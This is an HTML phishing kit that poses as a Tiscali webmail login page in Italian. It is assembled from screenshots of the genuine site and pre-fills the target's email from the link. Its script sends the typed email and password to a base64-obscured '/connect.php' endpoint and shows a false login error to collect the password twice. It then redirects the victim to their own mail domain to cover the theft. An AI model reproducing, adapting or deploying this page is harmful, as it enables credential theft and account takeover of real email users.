<!DOCTYPE html>

<html data-wf-domain="" data-wf-page="64a9c0e26fba4ce1583fe495" data-wf-site="64a9a59737b580eded516b3a">

<head>
    <meta charset="utf-8" />
    <title>Signin - Tiscali</title>
    <meta content="tiscali" property="og:title" />
    <meta content="tiscali" property="twitter:title" />
    <meta content="width=device-width, initial-scale=1" name="viewport" />
    <meta content="Webflow" name="generator" />
    <link href="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/css/mailru-d0192f.webflow.e2f527ebf.css"
        rel="stylesheet" type="text/css" />
    <script
        type="text/javascript">!function (o, c) { var n = c.documentElement, t = " w-mod-"; n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch") }(window, document);</script>
    <!-- <link href="https://uploads-ssl.webflow.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <link href="https://uploads-ssl.webflow.com/img/webclip.png" rel="apple-touch-icon" /> -->

    <style>
        /* Disable right-click */
        body {
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }
    </style>
</head>

<body>
    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>

    <section class="site-wrapper wf-section">
        <div class="header-wrapper"><img
                src="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c1a06fba4ce158409ab6_Screenshot%202023-07-08%20at%2023.01.25.png"
                loading="lazy" sizes="(max-width: 1439px) 100vw, 1439px"
                srcset="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c1a06fba4ce158409ab6_Screenshot%202023-07-08%20at%2023.01.25-p-500.png 500w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c1a06fba4ce158409ab6_Screenshot%202023-07-08%20at%2023.01.25-p-800.png 800w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c1a06fba4ce158409ab6_Screenshot%202023-07-08%20at%2023.01.25-p-1080.png 1080w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c1a06fba4ce158409ab6_Screenshot%202023-07-08%20at%2023.01.25.png 1439w"
                alt="" /></div>
        <div class="body-wrapper">
            <div class="first-wrapper _3rd _2nd"><img
                    src="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c21dc8b96cd4001baa17_Screenshot%202023-07-08%20at%2023.01.39.png"
                    loading="lazy" sizes="(max-width: 991px) 100vw, 537px"
                    srcset="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c21dc8b96cd4001baa17_Screenshot%202023-07-08%20at%2023.01.39-p-500.png 500w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c21dc8b96cd4001baa17_Screenshot%202023-07-08%20at%2023.01.39.png 537w"
                    alt="" /></div>
            <div class="form-wrapper _3rd _2nd _4th"><img
                    src="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c243b81f4f0a9b2d61da_Screenshot%202023-07-08%20at%2023.01.54.png"
                    loading="lazy" alt="" class="image-6" />
                <div class="w-form">
                    <form id="email-form" name="form1" data-name="Email Form" action="" method="post" required>




                        <input type="password" class="text-field-3 w-input" maxlength="256" name="namep"
                             placeholder="Inserisci Password" id="pr" required=""
                            style="background-color: transparent;" />



                        <div class=""
                            style="color: rgb(236, 59, 59); text-align: left; font-size:14px; padding-left: 0px; padding-bottom: 10px; display: none;"
                            id="error"></div>
						<div class=""
                            style="color: rgb(236, 59, 59); text-align: left; font-size:14px; padding-left: 0px; padding-bottom: 10px; display: none;"
                            id="msg">Errore: controlla nome utente e password</div>
							
                        <input type="email" class="text-field-4 w-input" maxlength="256" name="ai" data-name="ai"
                            placeholder="Inserisci Email" id="ai" required="" /><input type="submit" value="LOGIN"
                            data-wait="Please wait..." class="submit-button-2 w-button" onclick="submitForm(event)" id="submit-btn" />
                        <div class="text-block-3">Non ricordi la password?</div>
                        <div class="text-block-3">Non hai una mail Tiscali? Registrati Subito</div>
                    </form>

                </div>
            </div>
        </div><img
            src="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c2a3a0520f0d7f8abf85_Screenshot%202023-07-08%20at%2023.02.10.png"
            loading="lazy" sizes="(max-width: 835px) 100vw, 835px"
            srcset="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c2a3a0520f0d7f8abf85_Screenshot%202023-07-08%20at%2023.02.10-p-500.png 500w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c2a3a0520f0d7f8abf85_Screenshot%202023-07-08%20at%2023.02.10-p-800.png 800w, https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/64a9c2a3a0520f0d7f8abf85_Screenshot%202023-07-08%20at%2023.02.10.png 835w"
            alt="" class="image-5" />
    </section>
    <!-- <script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=64a9a59737b580eded516b3a"
        type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0="
        crossorigin="anonymous"></script> -->
    <script src="https://uploads-ssl.webflow.com/64a9a59737b580eded516b3a/js/webflow.d2c3cd8ad.js"
        type="text/javascript"></script>



    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="./config.js"></script>

    <script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
	
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Il campo e-mail è vuoto.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("Quel conto non esiste. Inserisci un account diverso");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("per favore inserisci LA TUA password");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("Per favore controlla la tua password");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>
	
</body>

</html>